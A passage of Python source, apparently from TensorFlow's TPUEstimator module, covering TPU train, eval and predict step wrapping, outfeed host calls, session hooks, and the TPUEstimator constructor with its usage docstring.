_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is the dtypes and shapes, so any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Performs some sanity checks and logs user-friendly information. Ideally we
should error out to give users a better error message, but if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
user code, so we log a warning instead.
Raises:
RuntimeError: If the validation failed.
"""
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
'instructions).')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent, and
performs the necessary checks and mutations required by TPU training and
evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, captured scaffold_fn, and captured
training hooks. The train_fn represents the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(loss):
"""Training step function for use inside a while loop."""
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op]):
host_call_outfeed_ops = []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call.record({'host_call': estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, captured scaffold_fn, and captured eval
hooks. The eval_fn represents the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, captured scaffold_fn, and captured
prediction hooks. The predict_fn represents the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Add validation for the prediction dictionary.
# TODO(xiejw): Add support for a single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
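# Example of the constraint enforced above (hypothetical tensors): every value
# in TPUEstimatorSpec.predictions must have a static leading (batch) dimension.
#
#   predictions = {'probabilities': probs}      # shape [128, 10]   -> accepted
#   predictions = {'probabilities': probs_dyn}  # shape [None, 10]  -> ValueError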
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, ops.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Makes deep copies of `config` and `params` in case the user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format('training_chief_hooks') + ' If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise e
return ret
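# Illustrative use of create_cpu_hostcall (hypothetical `host_fn`, `gs`, `loss`
# tensors): when running on CPU, the recorded function is simply applied to its
# tensors, with no outfeed involved.
#
#   host_calls = {'host_call': (host_fn, [gs, loss])}
#   ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
#   # ret['host_call'] == host_fn(gs, loss)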
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated tensors are passed to the host_fn, which
is executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If an outfeed tensor is a scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constrain it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with ops.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
# It is assumed evaluation always happens on a single-host TPU system, so
# place all ops on the TPU host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# TODO(xiejw): Allow users to specify the axis for batch size
# dimension.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = self._host_fns[name](**dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise e
else:
ret[name] = self._host_fns[name](*dequeue_ops)
return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info('global_step/sec: %g', global_step_per_sec)
logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size into a per-shard batch size when
calling the `input_fn` and `model_fn`. Users should specify the global batch
size in the constructor and then get the batch size for each shard in
`input_fn` and `model_fn` from `params['batch_size']` (see the sketch after
the list below).
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` gets per-host batch size.
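As a quick illustration (a sketch only; the batch size and replica count below
are assumed, not defaults):
```
# Assumed setup: train_batch_size=1024 passed to the constructor and a slice
# with 8 replicas.
global_batch_size = 1024
num_replicas = 8
per_shard_batch_size = global_batch_size // num_replicas  # == 128
# model_fn sees this per-shard value as params['batch_size']; input_fn may
# instead see a per-host value, as described above.
```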
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. However, if eval_on_tpu is False, `model_fn` must return
`EstimatorSpec` and the evaluation will execute on CPU or GPU; in this case
the following discussion on TPU evaluation does not apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
prediction will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.metrics.accuracy(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is a list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode == tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large-batch inference.
It is not designed for latency-critical systems. In addition, due to some
usability issues, for prediction with a small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shut down the TPU system
properly for the user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random_uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=predict_input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_savedmodel` exports 2 metagraphs, one with `tag_constants.SERVING`,
and another with `tag_constants.SERVING` and `tag_constants.TPU`.
At serving time, these tags are used to select the metagraph to load.
Before running the graph on TPU, the TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If
not, please call `session.run(tpu.initialize_system())`.
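A minimal sketch of manual initialization (illustrative only; assumes a plain
`tf.Session` is used outside TensorFlow Serving and that `tpu_grpc_url` points
at the TPU worker):
```
sess = tf.Session(tpu_grpc_url)
sess.run(tpu.initialize_system())
# ... load the metagraph tagged [SERVING, TPU] and run inference ...
sess.run(tpu.shutdown_system())
```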
`tpu.outside_compilation` can be used to wrap TPU incompatible ops in
`model_fn`.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] = (
export_output_lib.ClassificationOutput(classes=classes))
tpu.outside_compilation(host_call, logits)
...
```
"""
def __init__(self,
model_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
warm_start_from=None):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, `evaluation_hooks`,
and `prediction_hooks` must not capture any TPU Tensor inside the
model_fn.
model_dir: Directory to save model parameters, graph, etc. This can
also be used to load checkpoints from the directory into an estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be the same. If
both are `None`, a temporary directory will be used.
config: A `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyperparameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently:
- TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval (see below).
- Prediction still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`. Must be divisible by total
number of replicas.
eval_batch_size: An int representing evaluation batch size. Must be
divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size. Must be
divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_savedmodel()` exports a metagraph for
serving on TPU besides the one on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings` object to fully
configure warm-starting. If the string filepath is provided instead of
a `WarmStartSettings`, then all variables are warm-started, and it is
assumed that vocabularies and Tensor names are unchanged.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
'`config` must be provided with type `tpu_config.RunConfig`')
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError('{} are reserved keys but exist in params {}.'.format(
_RESERVED_PARAMS_KEYS, params))
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError('`train_batch_size` cannot be `None`')
util_lib.check_positive_integer(train_batch_size, 'train_batch_size')
if (config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.PER_SHARD_V1 and
config.tpu_config.num_cores_per_replica):
raise ValueError(
'Model parallelism only supports per host input for training. '
'Please adjust TPURunconfig.per_host_input_for_training.')
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, 'eval_batch_size')
if predict_batch_size is not None:
util_lib.check_positive_integer(predict_batch_size,
'predict_batch_size')
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(model_fn, params) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(model_fn, batch_axis)
# Overwrite log_step_count_steps to prevent TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Always pass non-None params, as the wrapped model_fn expects it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from)
self._iterations_per_training_loop = (
self._config.tpu_config.iterations_per_loop)
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config, train_batch_size, eval_batch_size, predict_batch_size,
use_tpu, eval_on_tpu)
self._export_to_tpu = export_to_tpu
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(self,
builder,
input_receiver_fn_map,
checkpoint_path,
strip_default_attrs,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
raise NotImplementedError(
'TPUEstimator only handles mode PREDICT for exporting '
'when `export_to_tpu` is `True`; '
'got {}.'.format(mode))
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
strip_default_attrs,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables))
if self._export_to_tpu:
input_receiver_fn_map = {
_REWRITE_FOR_INFERENCE_MODE: input_receiver_fn_map[mode]
}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _REWRITE_FOR_INFERENCE_MODE
# See b/110052256 for why `check_variables` is `False`.
(super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
strip_default_attrs,
save_variables=False,
mode=mode,
export_tags=export_tags,
check_variables=False))
def _call_model_fn(self, features, labels, mode, config):
if mode == _REWRITE_FOR_INFERENCE_MODE:
return self._call_model_fn_for_inference(features, labels, mode, config)
